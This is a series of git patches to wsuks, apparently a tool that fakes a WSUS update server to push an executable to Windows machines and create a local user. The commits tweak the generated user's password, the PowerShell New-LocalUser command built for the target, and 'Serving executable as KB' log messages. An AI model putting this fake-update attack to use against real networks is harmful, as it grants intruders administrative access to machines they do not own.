From 40ce3d7edcc6a37f5802c9a4b6ead02b9f05b38c Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:10:32 +0300 Subject: [PATCH 01/11] Add "!" for password complexity compliancve to generated password --- wsuks/wsuks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 5abca1d..793f377 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -32,7 +32,7 @@ def __init__(self, args): self.logger.error(f"Interface '{args.interface}' not found! Exiting...") exit(1) self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) - self.local_password = "".join(random.sample(ascii_letters, 16)) + self.local_password = "".join(random.sample(ascii_letters, 16), "!") # Set args self.targetIp = args.targetIp # Never None (required) From 20ba8042bfb52367a776fcfcead3ccfa126c6dd7 Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:12:13 +0300 Subject: [PATCH 02/11] fix --- wsuks/wsuks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 793f377..71d7738 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -32,7 +32,7 @@ def __init__(self, args): self.logger.error(f"Interface '{args.interface}' not found! Exiting...") exit(1) self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) - self.local_password = "".join(random.sample(ascii_letters, 16), "!") + self.local_password = "".join([random.sample(ascii_letters, 16), "!"]) # Set args self.targetIp = args.targetIp # Never None (required) From 137f4139126e396aa5dbc1be80297413abd2394f Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:14:01 +0300 Subject: [PATCH 03/11] fix 2 --- wsuks/wsuks.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 71d7738..7b4dd8d 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -32,7 +32,8 @@ def __init__(self, args): self.logger.error(f"Interface '{args.interface}' not found! Exiting...") exit(1) self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) - self.local_password = "".join([random.sample(ascii_letters, 16), "!"]) + self.local_password = "".join(random.sample(ascii_letters, 16)) + "!" + # Set args self.targetIp = args.targetIp # Never None (required) From a5604968e0d34f711945a6fb0f59aec4d71e5731 Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:17:14 +0300 Subject: [PATCH 04/11] u --- wsuks/wsuks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 7b4dd8d..c20153d 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -32,7 +32,7 @@ def __init__(self, args): self.logger.error(f"Interface '{args.interface}' not found! Exiting...") exit(1) self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) - self.local_password = "".join(random.sample(ascii_letters, 16)) + "!" + self.local_password = "".join(random.sample(ascii_letters, 16)) + "1" + "!" # Set args From c6ca2396d5d8e6fa3f3c7fe3c129386d4b4b83ea Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:26:26 +0300 Subject: [PATCH 05/11] u --- wsuks/wsuks.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index c20153d..163e942 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -88,7 +88,8 @@ def __init__(self, args): else: ps_script += line self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}") - create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n" + # create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n" + create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n" self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username) self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.") self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}") From d041c0821957f5f678b8b4dc8c44d991d9ef1a15 Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:34:31 +0300 Subject: [PATCH 06/11] u --- wsuks/helpers/wsusserver.py | 1 + 1 file changed, 1 insertion(+) diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py index f2eeb23..bb89c53 100644 --- a/wsuks/helpers/wsusserver.py +++ b/wsuks/helpers/wsusserver.py @@ -95,6 +95,7 @@ def set_resources_xml(self, command): command=html.escape(html.escape(self.command)), url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}") file.close() + print("Serving KB: self.kb_number") with open(f"{path}/xml_files/report-event-batch.xml") as file: self.report_event_batch_xml = file.read() From 5000eeeab78bc899c476594478c3eb64bb19ac81 Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:35:20 +0300 Subject: [PATCH 07/11] u --- wsuks/helpers/wsusserver.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py index bb89c53..23bff05 100644 --- a/wsuks/helpers/wsusserver.py +++ b/wsuks/helpers/wsusserver.py @@ -95,7 +95,7 @@ def set_resources_xml(self, command): command=html.escape(html.escape(self.command)), url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}") file.close() - print("Serving KB: self.kb_number") + print(f"Serving KB: {self.kb_number}") with open(f"{path}/xml_files/report-event-batch.xml") as file: self.report_event_batch_xml = file.read() From da0a9b911b668a65dc603219163e75e919a4b22a Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:36:55 +0300 Subject: [PATCH 08/11] u --- wsuks/wsuks.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 163e942..9b03856 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -88,8 +88,8 @@ def __init__(self, args): else: ps_script += line self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}") - # create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n" - create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n" + create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n" + #create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n" self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username) self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.") self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}") From f806922664330339cb62fa21db749ea461478647 Mon Sep 17 00:00:00 2001 From: kcancurly Date: Wed, 29 Oct 2025 13:41:50 +0300 Subject: [PATCH 09/11] u --- wsuks/helpers/wsusserver.py | 1 - wsuks/wsuks.py | 4 ++-- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/wsuks/helpers/wsusserver.py b/wsuks/helpers/wsusserver.py index 23bff05..f2eeb23 100644 --- a/wsuks/helpers/wsusserver.py +++ b/wsuks/helpers/wsusserver.py @@ -95,7 +95,6 @@ def set_resources_xml(self, command): command=html.escape(html.escape(self.command)), url=f"{self.client_location}/{uuid.uuid4()}/{self.executable_name}") file.close() - print(f"Serving KB: {self.kb_number}") with open(f"{path}/xml_files/report-event-batch.xml") as file: self.report_event_batch_xml = file.read() diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 9b03856..14ba7c0 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -32,7 +32,7 @@ def __init__(self, args): self.logger.error(f"Interface '{args.interface}' not found! Exiting...") exit(1) self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) - self.local_password = "".join(random.sample(ascii_letters, 16)) + "1" + "!" + self.local_password = "".join(random.sample(ascii_letters, 14)) + "1" + "!" # Set args @@ -89,7 +89,6 @@ def __init__(self, args): ps_script += line self.logger.success(f"Generated local user for the WSUS attack: Username={highlight(self.local_username, 'green')} Password={highlight(self.local_password, 'green')}") create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force) -Description $(\n{ps_script});\n" - #create_user = f"New-LocalUser -Name {self.local_username} -Password $(ConvertTo-SecureString {self.local_password} -AsPlainText -Force);\n" self.command = str(args.command).format(CREATE_USER_COMMAND=create_user, WSUKS_USER=self.local_username) self.logger.warning("WARNING: LocalAccountTokenFilterPolicy will be to 1 to allow remote administrative connections with local accounts. See README for details.") self.logger.success(f"Command to execute: \n{highlight(self.executable_name, 'yellow')} {highlight(self.command, 'yellow')}") @@ -148,6 +147,7 @@ def run(self): try: self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...") + self.logger.info(f"Serving KB: {update_handler.kb_number}") http_server.serve_forever() except KeyboardInterrupt: print() From 4ee4d1cfbd7c64001d098263f243d79cb3f4547a Mon Sep 17 00:00:00 2001 From: Alexander Neff Date: Wed, 29 Oct 2025 07:27:00 -0400 Subject: [PATCH 10/11] Refine log message --- wsuks/wsuks.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 14ba7c0..40fd614 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -147,7 +147,7 @@ def run(self): try: self.logger.info(f"Starting WSUS Server on {self.hostIp}:{self.wsusPort}...") - self.logger.info(f"Serving KB: {update_handler.kb_number}") + self.logger.info(f"Serving executable as KB: {update_handler.kb_number}") http_server.serve_forever() except KeyboardInterrupt: print() From 0f55dd1c341aa568f2858fec7d13910613b66534 Mon Sep 17 00:00:00 2001 From: Alexander Neff Date: Wed, 29 Oct 2025 07:44:44 -0400 Subject: [PATCH 11/11] Linting --- wsuks/wsuks.py | 1 - 1 file changed, 1 deletion(-) diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py index 40fd614..e70f7f6 100644 --- a/wsuks/wsuks.py +++ b/wsuks/wsuks.py @@ -34,7 +34,6 @@ def __init__(self, args): self.local_username = "user" + "".join(random.choice(digits) for i in range(5)) self.local_password = "".join(random.sample(ascii_letters, 14)) + "1" + "!" - # Set args self.targetIp = args.targetIp # Never None (required) self.executable_file = args.executable.read()